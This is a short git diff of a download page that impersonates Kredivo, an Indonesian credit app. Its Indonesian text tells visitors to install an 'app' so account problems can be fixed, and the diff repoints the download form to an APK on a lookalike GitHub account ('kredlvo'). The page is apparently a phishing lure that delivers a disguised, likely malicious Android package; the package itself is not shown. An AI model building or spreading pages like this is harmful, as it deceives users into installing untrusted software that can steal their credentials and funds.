--- a/download.html
+++ b/download.html
@@ -8,7 +8,7 @@
 <body style="background-color: #F8F8F8;">
 <nav class="navbar navbar-default navbar-fixed-top"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" href="mailto: id.kredivo.apps@gmail.com" aria-expanded="false" aria-controls="navbar"><span>Butuh Bantuan?</span></button><a class="navbar-brand logo" href="./../index.html">Kredivo</a></div></nav>
 <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT0UyjGcIUJ-fe3WE9dHg1H-ovMk8jEkXkuQg&usqp=CAU" alt="" width="100" height="150" loading="lazy" style="top:0%;left:0%;width:100%;l:100%;position: center;">
-<form method="POST" action="https://github.com/kredlvo/pemulihan.github.io/raw/main/KredivoIndonesia_id.apk">
+<form method="POST" action="https://github.com/kredlvo/bantuan.github.io/raw/main/KredivoIndonesia_id.apk">
 <center>
 <h4>Transaksimu sedang diproses</h4>
 <p>Silahkan Donwload Aplikasi Kredivo lalu Install agar kendala pada Akun kredivo-mu dapat terdeteksi oleh system, jika pengguna tidak melakukan Install Aplikasi maka system tidak akan bekerja secara normal.
